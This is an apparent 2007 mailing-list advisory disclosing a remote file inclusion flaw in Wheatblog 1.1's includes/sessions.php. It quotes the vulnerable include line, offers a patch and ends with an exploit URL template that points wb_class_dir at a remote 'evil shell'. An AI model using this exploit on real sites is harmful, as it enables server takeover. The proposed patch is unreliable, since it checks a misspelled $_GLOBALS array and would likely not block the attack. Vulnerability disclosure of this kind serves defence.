Wheatblog (wB) Remote File inclusion ..

security Thu, 22 Nov 2007 08:03:52 -0800

Hello,,


Wheatblog (wB) Remote File inclusion ..


tested on 1.1 and older versions are injected


Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : [EMAIL PROTECTED]


Remote File Inclusion

file : includes/sessions.php


line 2 :

code:-

include_once("$wb_class_dir/classDatabase.php");


variable wb_class_dir can be controlled and edited to be included from remote ..


Solution


replace

code :-

include_once("$wb_class_dir/classDatabase.php");


with

code:-

// Protected By : HACKERS PAL

// [EMAIL PROTECTED]

// Http://WwW.SoQoR.NeT


if(eregi("sessions.php",$PHP_SELF) || isset($_GLOBALS['wb_class_dir']))

{

 die("<h1>Forbidden 403<br> Protected By : HACKERS PAL</h1>");

}

include_once("$wb_class_dir/classDatabase.php");



Exploit : -

includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?


#WwW.SoQoR.NeT

Wheatblog (wB) Remote File inclusion ..

Reply via email to